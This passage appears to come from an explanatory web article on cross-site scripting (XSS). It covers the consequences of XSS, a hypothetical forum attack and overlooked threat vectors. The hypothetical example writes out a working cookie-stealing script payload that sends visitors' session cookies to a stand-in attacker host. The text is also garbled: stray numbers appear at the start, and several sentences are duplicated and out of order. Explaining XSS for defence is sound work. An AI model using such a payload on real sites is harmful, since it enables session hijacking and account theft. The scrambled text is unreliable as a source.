- 897
- 246
Although an attack doesn’t inflict direct harm on the website owner, it can have dire consequences for visitors to a compromised site. It can lead to:
To understand how dangerous XSS flaws can be, let's look at a hypothetical example:
The key enabler of XSS attacks is the poor handling of untrusted data in a web application. Unfortunately, many companies fail to recognize or prioritize certain vulnerabilities:
- Redirects to unsecured, malicious sites
- Browsers crashing completely
- Active cookie and login data theft
- Account and credential compromise
- Fraudulent activity using stolen information
To understand how dangerous XSS flaws can be, let's look at a hypothetical example:
- A hacker discovers a website forum that displays user comments without any output encoding or validation.
- The attacker covertly injects a script like <script>window.location='http://hackersite.com?cookie='+document.cookie</script> into one of their comments that looks innocuous.
- Now whenever any user loads the page with this comment, the script will execute and send their session cookie to the hacker's server.
- By accessing the session cookie, the hacker can hijack the victim's account on the web application.
- The attacker could go on to post more comments with malicious scripts and exploit more users.
Overlooked Threat Vectors
The key enabler of XSS attacks is the poor handling of untrusted data in a web application. Unfortunately, many companies fail to recognize or prioritize certain vulnerabilities:
- Legacy web apps - Older web applications were built without security in mind and may unknowingly be prone to XSS injections.
- Rich text/HTML editors - Features allowing custom fonts, embedded media etc often do not validate pasted input properly, making them easy to exploit.
- Third-party integrations - Connecting apps via APIs or plugins creates additional data flow holes that need validation. Unsupervised use and lack of testing means these integrations can be quickly and easily compromised.